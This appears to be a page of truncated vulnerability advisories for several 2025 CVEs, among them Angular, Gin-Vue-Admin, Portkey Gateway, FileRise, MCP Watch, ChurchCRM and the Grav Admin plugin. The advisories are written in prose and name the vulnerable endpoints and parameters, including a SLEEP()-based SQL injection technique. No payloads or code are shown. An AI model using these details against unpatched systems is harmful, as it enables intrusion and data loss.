Overview CVE-2025-66412 is a Stored Cross-Site Scripting (XSS) vulnerability affecting Angular versions prior to 21.0.2, 20.3.15, and 19.2.17. This vulnerability resides in the Angular Template Compiler and allows attackers to inject malicious scripts into Angular applications due to an incomplete security schema within the compiler. Technical Details The root cause of this vulnerability is an incomplete security schema within the Angular Template Compiler. The compiler fails to properly identify certain URL-holding attributes as requiring strict URL security sanitization. This oversight allows attackers to bypass Angular’s built-in security mechanisms by injecting malicious scripts through attributes that could potentially contain `javascript:` URLs…
-
-
Overview CVE-2025-66410 identifies a critical security vulnerability in Gin-Vue-Admin, a backstage management system built on Vue and Gin. This vulnerability, present in versions 2.8.6 and earlier, allows attackers to delete arbitrary files on the server. By manipulating the ‘FileMd5’ parameter, a malicious actor can potentially cause significant damage, leading to data loss and system unavailability. Technical Details The vulnerability stems from insufficient input validation and sanitization of the FileMd5 parameter used in file deletion operations. An attacker can craft a malicious request containing a manipulated FileMd5 value, pointing to any file or directory accessible to the application process. The lack…
-
Overview CVE-2025-66405 describes a Server-Side Request Forgery (SSRF) vulnerability found in versions of Portkey.ai Gateway prior to 1.14.0. Portkey.ai Gateway is designed to be a fast AI Gateway with integrated guardrails. This vulnerability allowed attackers to potentially force the gateway to make requests to arbitrary internal or external servers, leading to information disclosure or other malicious activities. Technical Details The vulnerability stemmed from how the Portkey.ai Gateway handled the `x-portkey-custom-host` request header. Prior to version 1.14.0, the gateway prioritized the value supplied in this header to determine the destination `baseURL` for proxy requests. The proxy route would then append a…
-
Overview A stored cross-site scripting (XSS) vulnerability, identified as CVE-2025-66403, has been discovered in FileRise, a self-hosted web-based file manager. This vulnerability affects versions prior to 2.2.3. It stems from the application’s failure to properly sanitize uploaded SVG files, allowing attackers to inject malicious scripts that execute when other users view the compromised SVG file. Technical Details The vulnerability exists because FileRise accepts SVG files without adequate validation or sanitization of embedded script content. SVGs, being XML-based, can contain inline JavaScript or event-based scripting. When a malicious SVG file containing such scripts is uploaded and subsequently viewed within the FileRise…
-
Overview CVE-2025-66401 describes a critical command injection vulnerability found in MCP Watch version 0.1.2 and earlier. MCP Watch is a security scanner designed for Model Context Protocol (MCP) servers. This vulnerability allows an attacker to execute arbitrary commands on the host machine, potentially leading to complete system compromise. Technical Details The vulnerability resides within the cloneRepo method of the MCPScanner class. This method takes a githubUrl argument provided by the user and passes it directly to the operating system shell via the execSync function. Crucially, the application fails to sanitize or validate this user-supplied input before executing the command. By…
-
Overview CVE-2025-66400 is a security vulnerability affecting the mdast-util-to-hast library, a utility used for transforming Markdown Abstract Syntax Trees (mdast) to Hypertext Abstract Syntax Trees (hast). Versions 13.0.0 through 13.2.0 are vulnerable. This vulnerability allows attackers to inject arbitrary class names into the rendered HTML by using character references within the Markdown source. This, in turn, could allow malicious users to style rendered markdown, particularly code elements, to blend in with the rest of the page, potentially leading to phishing or other deceptive attacks. Technical Details The vulnerability stems from improper sanitization of character references when converting Markdown to HTML.…
-
Overview CVE-2025-66313 identifies a time-based blind SQL injection vulnerability present in ChurchCRM, an open-source church management system. This vulnerability affects versions 6.2.0 and earlier. The vulnerability resides in the handling of the 1FieldSec parameter. An attacker can inject SQL code, specifically utilizing the SLEEP() function, to induce deterministic server-side delays. This confirms that the provided value is being incorporated directly into a SQL query without proper parameterization or sanitization. Technical Details The root cause of this vulnerability is the improper handling of user-supplied input within the ChurchCRM application. Specifically, the 1FieldSec parameter is vulnerable. By injecting SQL code into this…
-
Overview CVE-2025-66312 is a Stored Cross-Site Scripting (XSS) vulnerability found in the Admin plugin for Grav CMS, a flat-file content management system. This vulnerability affects versions prior to 1.11.0-beta.1. The Admin plugin provides a user-friendly HTML interface for configuring Grav and managing content. Successful exploitation of this vulnerability allows attackers to inject malicious JavaScript code that will be stored on the server and executed in the browsers of other users who access the affected pages. Technical Details The vulnerability exists within the /admin/accounts/groups/Grupo endpoint of the Grav application. Specifically, the data[readableName] parameter is susceptible to Stored XSS. An attacker can…
-
Overview A critical Stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2025-66311, has been discovered in the Admin Plugin for Grav, a popular flat-file CMS. This vulnerability affects versions prior to 1.11.0-beta.1. The vulnerability allows attackers to inject malicious scripts into page frontmatter, which are then executed whenever an affected page is accessed through the administrative interface. Users of the Grav Admin plugin are strongly urged to update to version 1.11.0-beta.1 or later to mitigate this risk. Technical Details The vulnerability resides in the /admin/pages/[page] endpoint of the Grav Admin Plugin. Specifically, malicious scripts can be injected through the following parameters:…
-
Overview CVE-2025-66310 identifies a Stored Cross-Site Scripting (XSS) vulnerability in the Admin plugin for Grav CMS. This plugin provides a web-based interface for managing Grav installations. The vulnerability allows attackers to inject malicious JavaScript code into the page configuration, leading to potential account compromise and other severe consequences. The vulnerability affects versions prior to 1.11.0-beta.1. Technical Details The vulnerability resides in the /admin/pages/[page] endpoint of the Grav application’s Admin plugin. Specifically, the data[header][template] parameter is vulnerable to Stored XSS. An attacker can inject malicious JavaScript code into this parameter, which is then saved as part of the page’s frontmatter. This…